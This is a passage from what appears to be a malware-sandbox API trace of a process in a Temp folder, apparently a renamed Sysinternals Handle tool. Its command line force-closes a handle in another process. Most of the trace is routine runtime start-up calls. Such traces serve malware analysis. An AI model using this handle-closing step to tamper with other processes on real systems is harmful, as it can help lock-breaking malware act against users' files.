00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 700 os_tid = 0x5cc [0179.423] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff38 | out: lpSystemTimeAsFileTime=0x12ff38*(dwLowDateTime=0x245f46e0, dwHighDateTime=0x1d68287)) [0179.423] GetCurrentThreadId () returned 0x5cc [0179.423] GetCurrentProcessId () returned 0x91c [0179.423] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff40 | out: lpPerformanceCount=0x12ff40*=29977298105) returned 1 [0179.435] GetProcessHeap () returned 0x2d0000 [0179.435] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77940000 [0179.435] GetProcAddress (hModule=0x77940000, lpProcName="FlsAlloc") returned 0x77957190 [0179.436] GetProcAddress (hModule=0x77940000, lpProcName="FlsFree") returned 0x779515b0 [0179.436] GetProcAddress (hModule=0x77940000, lpProcName="FlsGetValue") returned 0x77963520 [0179.436] GetProcAddress (hModule=0x77940000, lpProcName="FlsSetValue") returned 0x7795bd90 [0179.436] GetProcAddress (hModule=0x77940000, lpProcName="InitializeCriticalSectionEx") returned 0x779579b0 [0179.436] GetProcAddress (hModule=0x77940000, lpProcName="CreateEventExW") returned 0x7798c590 [0179.436] GetProcAddress (hModule=0x77940000, lpProcName="CreateSemaphoreExW") returned 0x7798c4c0 [0179.436] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadStackGuarantee") returned 0x77948050 [0179.436] GetProcAddress (hModule=0x77940000, lpProcName="CreateThreadpoolTimer") returned 0x77948820 [0179.436] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadpoolTimer") returned 0x77a7b2f0 [0179.437] GetProcAddress (hModule=0x77940000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77a6d8c0 [0179.437] GetProcAddress (hModule=0x77940000, lpProcName="CloseThreadpoolTimer") returned 0x77a6d620 [0179.437] GetProcAddress (hModule=0x77940000, lpProcName="CreateThreadpoolWait") returned 0x7798ba80 [0179.437] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadpoolWait") returned 0x77a7e170 [0179.437] GetProcAddress (hModule=0x77940000, lpProcName="CloseThreadpoolWait") returned 0x77a6c540 [0179.437] GetProcAddress (hModule=0x77940000, lpProcName="FlushProcessWriteBuffers") returned 0x77ab1f80 [0179.437] GetProcAddress (hModule=0x77940000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77b2ec60 [0179.437] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentProcessorNumber") returned 0x77ab0040 [0179.437] GetProcAddress (hModule=0x77940000, lpProcName="GetLogicalProcessorInformation") returned 0x7798b820 [0179.438] GetProcAddress (hModule=0x77940000, lpProcName="CreateSymbolicLinkW") returned 0x779b5ad0 [0179.438] GetProcAddress (hModule=0x77940000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0179.438] GetProcAddress (hModule=0x77940000, lpProcName="EnumSystemLocalesEx") returned 0x7798c3d0 [0179.438] GetProcAddress (hModule=0x77940000, lpProcName="CompareStringEx") returned 0x7798b980 [0179.438] GetProcAddress (hModule=0x77940000, lpProcName="GetDateFormatEx") returned 0x779d0920 [0179.438] GetProcAddress (hModule=0x77940000, lpProcName="GetLocaleInfoEx") returned 0x77943c10 [0179.438] GetProcAddress (hModule=0x77940000, lpProcName="GetTimeFormatEx") returned 0x779cd4e0 [0179.439] GetProcAddress (hModule=0x77940000, lpProcName="GetUserDefaultLocaleName") returned 0x7798b790 [0179.439] GetProcAddress (hModule=0x77940000, lpProcName="IsValidLocaleName") returned 0x7798b770 [0179.439] GetProcAddress (hModule=0x77940000, lpProcName="LCMapStringEx") returned 0x7798b710 [0179.439] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentPackageId") returned 0x0 [0179.439] GetProcAddress (hModule=0x77940000, lpProcName="GetTickCount64") returned 0x77949450 [0179.439] GetProcAddress (hModule=0x77940000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0179.439] GetProcAddress (hModule=0x77940000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0179.440] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x478) returned 0x2ef050 [0179.440] GetCurrentThreadId () returned 0x5cc [0179.440] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x28) returned 0x2e5ed0 [0179.441] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb00) returned 0x2ef4d0 [0179.441] GetStartupInfoW (in: lpStartupInfo=0x12fe90 | out: lpStartupInfo=0x12fe90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x14000c2d0, hStdError=0x2ef050)) [0179.441] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0179.441] GetFileType (hFile=0x3) returned 0x2 [0179.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0179.920] GetFileType (hFile=0x7) returned 0x2 [0179.921] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0179.921] GetFileType (hFile=0xb) returned 0x2 [0179.921] GetCommandLineW () returned="tdq963ii.exe -accepteula -c 130 -y -p 2880 -nobanner" [0179.921] GetEnvironmentStringsW () returned 0x2effe0* [0179.921] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xb38) returned 0x2f0b20 [0179.922] FreeEnvironmentStringsW (penv=0x2effe0) returned 1 [0179.922] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14002c980, nSize=0x104 | out: lpFilename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe")) returned 0x33 [0179.922] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xb2) returned 0x2f1660 [0179.922] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x138) returned 0x2f1720 [0179.922] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x3e) returned 0x2e6510 [0179.922] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x6c) returned 0x2f1860 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x62) returned 0x2f18e0 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x78) returned 0x2f1950 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x62) returned 0x2f19d0 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2e) returned 0x2ede00 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x48) returned 0x2e6560 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2a) returned 0x2ede40 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x28) returned 0x2e5f00 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1a) returned 0x2e5f30 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4a) returned 0x2f1a40 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x72) returned 0x2f1aa0 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x30) returned 0x2ede80 [0179.923] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2e) returned 0x2edec0 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1c) returned 0x2e5f60 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xd2) returned 0x2f1b20 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x7c) returned 0x2f1c00 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x3a) returned 0x2e65b0 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x90) returned 0x2f1c90 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x24) returned 0x2e5f90 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x30) returned 0x2edf00 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x36) returned 0x2edf40 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x3c) returned 0x2e6600 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x52) returned 0x2f1d30 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x3c) returned 0x2e6650 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x18) returned 0x2f1d90 [0179.924] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x82) returned 0x2f1db0 [0179.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2e) returned 0x2edf80 [0179.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1e) returned 0x2e5fc0 [0179.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2c) returned 0x2edfc0 [0179.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x54) returned 0x2f1e40 [0179.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x52) returned 0x2f1ea0 [0179.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2a) returned 0x2ee000 [0179.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x3c) returned 0x2e66a0 [0179.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x54) returned 0x2f1f00 [0179.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x24) returned 0x2e5ff0 [0179.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x30) returned 0x2ee040 [0179.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x8c) returned 0x2effe0 [0179.925] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0b20 | out: hHeap=0x2d0000) returned 1 [0179.926] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1000) returned 0x2f0080 [0179.926] GetLastError () returned 0x0 [0179.926] SetLastError (dwErrCode=0x0) [0179.927] GetLastError () returned 0x0 [0179.927] SetLastError (dwErrCode=0x0) [0179.927] GetLastError () returned 0x0 [0179.927] SetLastError (dwErrCode=0x0) [0179.927] GetACP () returned 0x4e4 [0179.927] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x228) returned 0x2f1090 [0179.927] GetLastError () returned 0x0 [0179.927] SetLastError (dwErrCode=0x0) [0179.927] IsValidCodePage (CodePage=0x4e4) returned 1 [0179.927] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe00 | out: lpCPInfo=0x12fe00) returned 1 [0179.927] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f8a0 | out: lpCPInfo=0x12f8a0) returned 1 [0179.927] GetLastError () returned 0x0 [0179.928] SetLastError (dwErrCode=0x0) [0179.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0179.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f5a0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿؙ?옸") returned 256 [0179.928] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿؙ?옸", cchSrc=256, lpCharType=0x12fbc0 | out: lpCharType=0x12fbc0) returned 1 [0179.928] GetLastError () returned 0x0 [0179.928] SetLastError (dwErrCode=0x0) [0179.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0179.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0179.928] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0179.929] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x12f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0179.929] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x12f9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0179.929] GetLastError () returned 0x0 [0179.929] SetLastError (dwErrCode=0x0) [0179.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0179.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0179.929] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0179.929] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x12f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0179.929] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x12fac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0179.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x100) returned 0x2f12c0 [0179.930] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140010890) returned 0x0 [0179.930] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2f12c0) returned 0x100 [0179.931] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77940000 [0179.931] GetProcAddress (hModule=0x77940000, lpProcName="IsWow64Process") returned 0x779491d0 [0179.931] GetCurrentProcess () returned 0xffffffffffffffff [0179.931] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x12fef0 | out: Wow64Process=0x12fef0) returned 1 [0179.931] GetLastError () returned 0x0 [0179.931] SetLastError (dwErrCode=0x0) [0179.931] GetLastError () returned 0x0 [0179.932] SetLastError (dwErrCode=0x0) [0179.932] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x0) returned 0x2 [0179.932] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x78) returned 0x0 [0179.932] RegQueryValueExW (in: hKey=0x78, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x12fc40, lpcbData=0x12fc48*=0x4 | out: lpType=0x0, lpData=0x12fc40*=0x0, lpcbData=0x12fc48*=0x4) returned 0x2 [0179.932] RegCloseKey (hKey=0x78) returned 0x0 [0179.932] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x78) returned 0x0 [0179.933] RegQueryValueExW (in: hKey=0x78, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x12fc40, lpcbData=0x12fc48*=0x4 | out: lpType=0x0, 